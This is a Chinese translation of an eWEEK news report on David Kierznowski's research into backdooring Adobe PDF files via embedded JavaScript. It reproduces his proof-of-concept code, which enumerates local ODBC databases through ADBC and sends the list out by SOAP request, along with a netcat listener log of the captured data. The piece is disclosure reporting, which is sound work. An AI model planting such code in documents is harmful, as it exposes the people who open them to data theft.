安全警报：黑客发现Adobe PDF的后门

Kierznowski说，乍看起来PDF文档显然是不安全的，这是因为它支持JavaScript脚本。然而，要想将这一特性用于攻击目的却需要一些巧妙的技术，绝不是像想象的那样简单。Adobe支持其自己的JavaScript对象模型，例如，"alert('xss')"必须被app对象调用，因此这变成了"app.alert('xss')"。这意味着利用JavaScript进行攻击时只能使用Adobe所支持的功能。其次，Adobe Reader和Adobe Professional所允许的JavaScript对象范围是不同的。Kierznowski在其网站上给出了两个实例以表明Adobe Professional和Adobe Reader如何可被用于后门攻击，两个例子都使用了"Page Open"（页面打开）事件，这一事件可以通过"Page Properties|Actions tab"（页面属性|动作标签）访问。

第一个攻击（PDF文件：http://michaeldaw.org/projects/backdoored1.pdf）同时影响Adobe Reader和Adobe Professional，它已在打过所有补丁的Adobe版本中证实，它由在一个PDF文件中加入的恶意链接引发。一旦该文档被打开，用户的浏览器便被自动开启并访问这一内嵌的链接。Kierznowski说，在Adobe 6和7中，打开这些URL前都没有给出任何的警告；很明显，这时任何恶意代码都可被执行。

第二个攻击（PDF文件：http://michaeldaw.org/projects/backdoored2.pdf）利用了Adobe系统的ADBC（Adobe数据库连接）和Web服务支持。"该攻击访问位于localhost上的Windows ODBC，列举可用的数据库并将这一信息通过Web服务发送到'localhost'。该攻击可以进一步被用于执行数据库查询。想象一下，攻击者可以通过用户的Web浏览器访问到你的内部数据库。"他说。Kierznowski在其blog（ http://michaeldaw.org/md-hacks/backdooring-pdf-files/）上给出了下面这段理论上被证实的代码：

var cURL = "http://localhost/";var cTestString = ""; var databaseList = ADBC.getDataSourceList();var DB = "";if (databaseList != null) {for (var i=0; i DB+=databaseList[i].name;}cTestString = DB;var response = SOAP.request( {cURL: cURL,oRequest: {"http://myxmlns/:echoString": {inputString: cTestString}},cAction: " http://additional-opt/"});var result = response["http://no-need/:echoStringResponse"]["return"];On the server side we get this:$ ./nc.exe -l -p 80 -vlistening on [any] 80 …connect to [127.0.0.1] from localhost [127.0.0.1] 1924POST / HTTP/1.1 Accept: */*Content-Type: text/xml; charset=UTF-8SOAPAction: "http://additional-opt/"Content-Length: 578User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)Host: localhostConnection: Keep-Alive Cache-Control: no-cache<?xml version="1.0″?><SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/so ap/encoding/" xmlns:ns0="http://myxmlns/"><inputString xsi:type="xsd:string">MS Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Filesdbase1</inputString></ns0:echoString> </SOAP-ENV:Body></SOAP-ENV:Envelope>

Kierznowski指出，在PDF文件中至少还有其他7个漏洞可被攻击者用于执行恶意代码。注意到Adobe Acrobat支持"HTML表单"和"文件系统访问"的使用，他说"如果再进一步发挥创造力，更简单的和/或更高级的攻击可以被放在一起。"Kierznowski在其blog上说他还有一些其他有趣的发现，其中之一是你可以通过将一个后门Javascript文件读入一个本地路径后在所有Adobe Acrobat文件中加入后门。

Kierznowski说他在PDF文件中审查后门的好奇心来对于关于"被动攻击"概念的着迷。 他在提到内部用户对周围的网络通常表示信任时说："诸如缓存溢出这样的主动攻击技术已经越来越难被发现和利用……未来的安全攻击的希望在于Web技术。" 微软Office应用程序（Word，Excel，Powerpoint）被用于瞬时攻击的趋势得以证实后，Kierznowski看到了客户方攻击的未来在于挖掘服务的功能。 他说："这种形式的攻击只是有效利用用户信任的圈子操纵其客户端完成一个特定的功能。"

Adobe产品安全事件相应小组的一名发言人说，公司已经得知Kierznowski的发现并正在"积极调查"这一问题。 位于加州圣何塞总部的公司在发往eWEEK的声明中说："如果Adobe证实我们的某个产品将受到安全攻击的影响，这一安全攻击的细节及适当的解决方案将被编档发布。"

（完）

(t116)

===============================================

原文链接：http://www.eweek.com/article2/0,1895,2016606,00.asp;

http://michaeldaw.org/md-hacks/backdooring-pdf-files/

原文作者：Ryan Naraine; David Kierznowski